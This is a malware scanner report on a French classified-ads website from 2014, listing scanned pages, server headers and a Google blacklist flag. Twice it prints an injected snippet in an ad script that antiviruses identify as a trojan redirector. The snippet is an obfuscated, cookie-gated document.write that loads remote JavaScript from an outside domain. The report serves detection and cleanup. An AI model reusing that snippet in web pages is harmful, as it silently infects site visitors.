Malware Scanner report for annonces-normandie.fr

Malicious/Suspicious/Total urls checked: 2/4/19

6 pages have malicious or suspicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "annonces-normandie.fr" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=annonces-normandie.fr

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://annonces-normandie.fr/	HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 09:51:29 GMT Location: http://www.annonces-normandie.fr/ Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14 Content-Length: 378 Content-Type: text/html; charset=iso-8859-1	clean
http://www.annonces-normandie.fr/	200 OK Content-Length: 22749 Content-Type: text/html	suspicious
Page code contains blacklisted domain: www.annonces.paris-normandie.fr ...[1211 bytes skipped]... ta name="y_key" content="" /> <meta name="msvalidate.01" content="" /> <link rel="SHORTCUT ICON" href="http://www.annonces-normandie.fr/images/favicon.ico" type="image/x-icon" /> <link rel="alternate" type="application/rss+xml" title="S'abonner à annonces-normandie.fr" href="http://www.annonces-normandie.fr/index.php/pqractu/default/rss"> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css.css" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css_print.css" media="print" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/lightbox/highslide.css" /> <script type="text/javascript" src="http://www.annonces.paris-normandie.fr/js/default_js.js" ></script> <script type="text/javascript"> ...[2803 bytes skipped]...
http://www.annonces.paris-normandie.fr/js/default_js.js	200 OK Content-Length: 80104 Content-Type: application/x-javascript	suspicious
Page code contains blacklisted domain: www.annonces-normandie.fr // fonction de popup centrée function ouvrir(l,h,url) { hauteur=Math.round((screen.availHeight-h)/2); largeur=Math.round((screen.availWidth-l)/2); window.open(url, "site"+l+h, "toolbar=0,location=0,directories=0,status=0, scrollbars=yes,resizable=0,menubar=0,top="+hauteur+",left="+largeur+",width="+l+",height="+h); } // fonction de sélection d'objet function MM_findObj(n, d) { //v4.01 var p,i,x; if(!d) d=docu ...[4206 bytes skipped]...
http://www.annonces.paris-normandie.fr/js/pqr_oas.js	200 OK Content-Length: 1813 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) OAS_version = 10; OAS_rn = '001234567890'; OAS_rns = '1234567890'; OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11); function OAS_NORMAL(pos) { document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>'); document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + ... 979 bytes are skipped ...pos); else OAS_NORMAL(pos); } if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+246060*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports: Avast JS:Includer-BGC [Trj] Kaspersky Trojan.JS.Redirector.adm McAfee JS/Redirector.co AVG JS/Redir Symantec Trojan.Malscript
http://www.annonces.paris-normandie.fr/js/fonctions.js	200 OK Content-Length: 5782 Content-Type: application/x-javascript	clean
http://www.annonces.paris-normandie.fr/js/xiti.js	200 OK Content-Length: 11791 Content-Type: application/x-javascript	clean
http://annonces-normandie.fr/?Copix=3ae7d275cf23e0727f1505e97bc6f79e	HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 09:51:31 GMT Location: http://www.annonces-normandie.fr/?Copix=3ae7d275cf23e0727f1505e97bc6f79e Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14 Content-Length: 417 Content-Type: text/html; charset=iso-8859-1	clean
http://www.annonces-normandie.fr/?copix=3ae7d275cf23e0727f1505e97bc6f79e	200 OK Content-Length: 22792 Content-Type: text/html	suspicious
Page code contains blacklisted domain: www.annonces.paris-normandie.fr ...[1211 bytes skipped]... ta name="y_key" content="" /> <meta name="msvalidate.01" content="" /> <link rel="SHORTCUT ICON" href="http://www.annonces-normandie.fr/images/favicon.ico" type="image/x-icon" /> <link rel="alternate" type="application/rss+xml" title="S'abonner à annonces-normandie.fr" href="http://www.annonces-normandie.fr/index.php/pqractu/default/rss"> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css.css" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css_print.css" media="print" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/lightbox/highslide.css" /> <script type="text/javascript" src="http://www.annonces.paris-normandie.fr/js/default_js.js" ></script> <script type="text/javascript"> ...[2803 bytes skipped]...
http://www.annonces-normandie.fr/?Copix=458557ff8acfada2b289dea8526bc83b	200 OK Content-Length: 22749 Content-Type: text/html	suspicious
Page code contains blacklisted domain: www.annonces.paris-normandie.fr ...[1211 bytes skipped]... ta name="y_key" content="" /> <meta name="msvalidate.01" content="" /> <link rel="SHORTCUT ICON" href="http://www.annonces-normandie.fr/images/favicon.ico" type="image/x-icon" /> <link rel="alternate" type="application/rss+xml" title="S'abonner à annonces-normandie.fr" href="http://www.annonces-normandie.fr/index.php/pqractu/default/rss"> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css.css" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/default_css_print.css" media="print" /> <link rel="stylesheet" type="text/css" href="http://www.annonces.paris-normandie.fr/styles/lightbox/highslide.css" /> <script type="text/javascript" src="http://www.annonces.paris-normandie.fr/js/default_js.js" ></script> <script type="text/javascript"> ...[2803 bytes skipped]...
http://www.annonces-normandie.fr/vitrines/liste-professionnels?selectedMenu=120	200 OK Content-Length: 26247 Content-Type: text/html	clean
http://www.annonces-normandie.fr/js/default_js.js	200 OK Content-Length: 80104 Content-Type: application/x-javascript	clean
http://www.annonces-normandie.fr/js/pqr_oas.js	200 OK Content-Length: 1813 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) OAS_version = 10; OAS_rn = '001234567890'; OAS_rns = '1234567890'; OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11); function OAS_NORMAL(pos) { document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>'); document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + ... 979 bytes are skipped ...pos); else OAS_NORMAL(pos); } if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+246060*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports: Avast JS:Includer-BGC [Trj] Kaspersky Trojan.JS.Redirector.adm McAfee JS/Redirector.co AVG JS/Redir Symantec Trojan.Malscript
http://www.annonces-normandie.fr/js/fonctions.js	200 OK Content-Length: 5782 Content-Type: application/x-javascript	clean
http://www.annonces-normandie.fr/js/xiti.js	200 OK Content-Length: 11791 Content-Type: application/x-javascript	clean
http://www.annonces-normandie.fr/vitrines/?Copix=b8513612a78f109ce08769b10389c665	HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Mon, 15 Sep 2014 09:51:34 GMT Pragma: no-cache Location: cms/6 Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14 Content-Length: 0 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-Powered-By: PHP/5.2.14	clean
http://www.annonces-normandie.fr/vitrines/cms/6	HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Mon, 15 Sep 2014 09:51:34 GMT Pragma: no-cache Location: cms/6 Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14 Content-Length: 0 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: Copix=3f20c29d9232fa870f1083f725a9dacb; path=/ X-Powered-By: PHP/5.2.14	clean
http://www.annonces-normandie.fr/vitrines/cms/cms/6	200 OK Content-Length: 1436 Content-Type: text/html	clean
http://www.annonces-normandie.fr/vitrines/cms/cms/function.array-merge	200 OK Content-Length: 1436 Content-Type: text/html	clean
http://www.annonces-normandie.fr/vitrines/cms/cms/function.session-start	200 OK Content-Length: 1436 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: annonces-normandie.fr

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 09:51:29 GMT
Location: http://www.annonces-normandie.fr/
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14
Content-Length: 378
Content-Type: text/html; charset=iso-8859-1

...378 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: annonces-normandie.fr
Referer: http://www.google.com/search?q=annonces-normandie.fr

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for annonces-normandie.fr

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools